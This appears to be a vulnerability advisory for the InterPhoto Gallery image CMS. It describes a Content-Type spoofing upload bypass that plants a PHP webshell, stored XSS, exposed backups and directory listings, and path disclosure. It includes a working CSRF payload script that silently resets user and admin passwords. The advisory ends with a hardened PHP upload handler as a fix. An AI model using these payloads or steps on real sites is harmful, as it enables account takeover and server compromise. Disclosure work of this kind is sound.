[ASCII banner] Day 6 (0day)

- Title: InterPhoto Gallery Multiple Remote Vulnerabilities
- Affected Version: <= 2.4.0
- Vendor Site: http://www.weensoft.com
- Discovery: Abysssec.com

- Description:
===============
InterPhoto Image Gallery is an open-source, easy-to-use, advanced, professional multi-user image website system that protects the images of your site. InterPhoto can be used to build all kinds of image-centric sites, such as design, fashion, exhibition, photography and painting sites.

- Vulnerabilities:
==================

1) Upload (bypass of the image uploader):
------------------------------------------------
InterPhoto allows registered users to upload images. A user can upload a PHP webshell this way: log in as a user, go to "Publish Image", select a file to upload, fill in the other required fields and submit. With a tamper-data tool (WebScarab, Paros, ...), trap the request and change the value of the "Content-Type" field to "image/jpeg".

Lines 143-150:

    ...
    if ($action == 'insertimage') {
        $imagefile = $_FILES['imagefile'];
        $valid_image_types = array('image/pjpeg', 'image/jpeg', 'image/jpg');
        $uploaddir = BASEPATH.'MyWebsiteImages/';
        @chmod($uploaddir,0777); // it will chmod the upload dir for execute as well!
    ...

As you can see in the flow, the type check is based on the client-supplied Content-Type, so a JPEG request can be spoofed.

Lines 43-56:

    ...
    if ($image_size[0] > 760 || $image_size[1] > 760) {
        if (@rename($uploaddir.$file_path.'/'.$imagename, $uploaddir.$file_path.'/original/'.$imagename)) {
            CreateImageFile($uploaddir.$file_path.'/original/'.$imagename, $uploaddir.$file_path."/760x760/".$imagename,'760');
            CreateImageFile($uploaddir.$file_path.'/760x760/'.$imagename, $uploaddir.$file_path."/160x160/".$imagename,'160');
            CreateImageFile($uploaddir.$file_path.'/160x160/'.$imagename, $uploaddir.$file_path."/80x80/".$imagename,'80');
            CreateImageFile($uploaddir.$file_path.'/80x80/'.$imagename, $uploaddir.$file_path."/32x32/".$imagename,'32');
        }
    } else {
        if (@rename($uploaddir.$file_path.'/'.$imagename, $uploaddir.$file_path.'/760x760/'.$imagename)) {
            CreateImageFile($uploaddir.$file_path.'/760x760/'.$imagename, $uploaddir.$file_path."/160x160/".$imagename,'160');
            CreateImageFile($uploaddir.$file_path.'/160x160/'.$imagename, $uploaddir.$file_path."/80x80/".$imagename,'80');
            CreateImageFile($uploaddir.$file_path.'/80x80/'.$imagename, $uploaddir.$file_path."/32x32/".$imagename,'32');
        }
    ...

Depending on the size of the file, you can find your shell under the following directory:
http://site.com/InterPhoto/MyWebsiteImages/

2) Persistent XSRFs:
-------------------
Several XSRF issues exist in this CMS, for example: delete a user's image, change user and admin passwords, change user and admin info, ...
Now consider changing the user and admin password:

+POC: As in item 1, go to Publish Image, select Edit HTML, and enter this code:

    <script>
    function creat_request(path, parameter, method) {
        method = method || "post";
        var remote_dive = document.createElement('div');
        remote_dive.id = 'Div_id';
        var style = 'border:0;width:0;height:0;';
        remote_dive.innerHTML = "<iframe name='iframename' id='iframeid' style='" + style + "'></iframe>";
        document.body.appendChild(remote_dive);
        var form = document.createElement("form");
        form.setAttribute("method", method);
        form.setAttribute("action", path);
        form.setAttribute("target", "iframename");
        for (var key in parameter) {
            var hiddenField = document.createElement("input");
            hiddenField.setAttribute("type", "hidden");
            hiddenField.setAttribute("name", key);
            hiddenField.setAttribute("value", parameter[key]);
            form.appendChild(hiddenField);
        }
        document.body.appendChild(form);
        form.submit();
    }
    creat_request('http://192.168.101.4/interphoto/mydesk.edit.php', {
        'action': 'updateuser', 'password': '123456', 'repassword': '123456',
        'email': 'admin@localhost.com', 'userfullname': '', 'usercompany': '',
        'useraddress': '', 'userpostcode': '', 'usertel': '', 'userfax': '',
        'useronline': '', 'userwebsite': ''
    });
    </script>

and submit. When any user views this section on the homepage, the request is sent with that user's session. The same applies to deleting the first uploaded image.

3) Stored XSS:
--------------
Log in as a user, go to "Publish Image", then in the "Image Description:" section select the Edit HTML icon and enter a script tag (also fill in the other required fields) and submit. To see the XSS, go to the homepage and click the last updated image. This is possible because InterPhoto uses nicEdit (an HTML editor) for the image description.

4) Information Disclosure:
---------------------------------------------
4.1) Backup database is downloadable:
+POC: http://site.com/InterPhoto/admin/backup/
+Fix: restrict access to this directory with an .htaccess file.
4.2) Directory listing:
+POC:
http://site.com/InterPhoto/admin/backup/
http://site.com/InterPhoto/MyWebsiteImages
http://site.com/InterPhoto/UploadImages/
http://site.com/InterPhoto/library/
http://site.com/InterPhoto/languages/
http://site.com/InterPhoto/includes/
http://site.com/InterPhoto/config/
http://site.com/InterPhoto/templates/
http://site.com/InterPhoto/upgrade/
http://site.com/InterPhoto/admin/includes/
http://site.com/InterPhoto/admin/templates/
and ...
+Fix: create an index.html in all folders.

5) Path Disclosure:
--------------------------------------
InterPhoto CMS uses the Smarty library (template engine). Requesting a library file directly fails because the parent class Smarty is undefined, and the resulting PHP error reveals the installation path.

+Code: for example, class Smarty undefined in /library/smarty/libs/Smarty_Compiler.class.php [line 35]:

    class Smarty_Compiler extends Smarty {
    ...

+POC:
http://site.com/InterPhoto/library/smarty/libs/Smarty_Compiler.class.php
http://site.com/InterPhoto/library/smarty/libs/plugins/modifier.date_format.php
http://site.com/InterPhoto/library/smarty/templates_c/ [all files]

+Fix: add at the top of the page:

    if(class_exists('Smarty')){

and at the end of the page:

    }
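As an added example (not code from the advisory or from InterPhoto), a hardened version of the "Publish Image" handler that addresses items 1 and 2 above: it requires a per-session CSRF token and identifies the upload by its bytes instead of the client-supplied Content-Type. The function names csrf_token, csrf_valid and validate_image and the upload directory path are assumptions.

```php
<?php
// Added example, not InterPhoto code: hardened "Publish Image" handler for
// items 1 and 2. Assumes a PHP session and an upload directory outside the
// web root (the path below is an assumption).
session_start();
// Item 2: per-session CSRF token. The form emits it as a hidden input named
// "csrf" whose value is csrf_token(); every state-changing POST must carry it.
function csrf_token(): string {
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'];
}

// Fails closed on a missing or stale token; hash_equals is constant-time.
function csrf_valid($submitted): bool {
    return is_string($submitted) && !empty($_SESSION['csrf'])
        && hash_equals($_SESSION['csrf'], $submitted);
}
// Item 1: $_FILES['imagefile']['type'] is only the client's Content-Type
// header, which is exactly what the advisory tampers with. Decide from the
// bytes instead and build the stored name from a random token plus an
// extension chosen by the server, discarding the user-supplied file name.
function validate_image(array $file): ?string {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']); // magic bytes
    $ext  = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'][$mime] ?? null;
    if ($ext === null || @getimagesize($file['tmp_name']) === false) {
        return null;                                  // not a real image
    }
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['action'] ?? '') === 'insertimage') {
    if (!csrf_valid($_POST['csrf'] ?? null)) {
        http_response_code(403);
        exit('invalid CSRF token');
    }
    $uploaddir = '/var/lib/interphoto/images/';       // assumption: not web-served
    $name = validate_image($_FILES['imagefile'] ?? []);
    if ($name === null) {
        http_response_code(400);
        exit('not a valid image');
    }
    move_uploaded_file($_FILES['imagefile']['tmp_name'], $uploaddir . $name);
    chmod($uploaddir . $name, 0644);                  // no chmod 0777 on the directory
}
```

Stored images are then served through a read-only script or a directory where PHP execution is disabled, so even a file that slipped through is never executed.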